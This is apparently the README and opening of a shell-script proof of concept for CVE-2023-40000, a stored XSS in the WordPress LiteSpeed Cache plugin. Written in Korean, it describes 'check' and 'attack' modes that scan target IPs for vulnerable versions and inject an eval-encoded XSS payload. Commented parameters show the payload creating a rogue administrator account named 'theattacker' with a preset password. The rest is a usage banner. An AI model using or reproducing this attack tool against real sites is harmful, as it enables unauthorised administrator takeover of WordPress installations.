
이것은 cve-2023-40000의 PoC입니다. Wordpress LiteSpeed Cache 익스플로잇.
이것은 cve-2023-40000의 PoC입니다. Wordpress LiteSpeed Cache 익스플로잇입니다.
이 CVE는 모든 LiteSpeed Cache < 5.7.0.1 버전에 적용될 수 있습니다.
check와 attack 두 가지 모드로 작동합니다.
취약한 IP는 버전을 grep합니다. 버전이 없는 경우(대상은 WAF로 보호됩니다).
XSS 코드는 미리 정의된 login/pass/email과 함께 eval 함수용으로 암호화됩니다.
# user_login=theattacker
# [email protected]
# pass1=attackpass&pass2=attackpass
# role=administrator
echo "----------------Welcome-to-cve-2023-40000-script-by-1veresk------------+";
echo "+----------------------------------------------------------------------+";
echo "+-------------------For-The-Help---------------------------------------+";
echo "Example#1: ./cve-2023-40000.sh -h--------------------------------------+";
echo "+-------------------For-The--Check-------------------------------------+";
echo "Example#2: ./cve-2023-40000.sh <TARGET_FILE> <MODE>--------------------+";
echo "+----------------------------------------------------------------------+";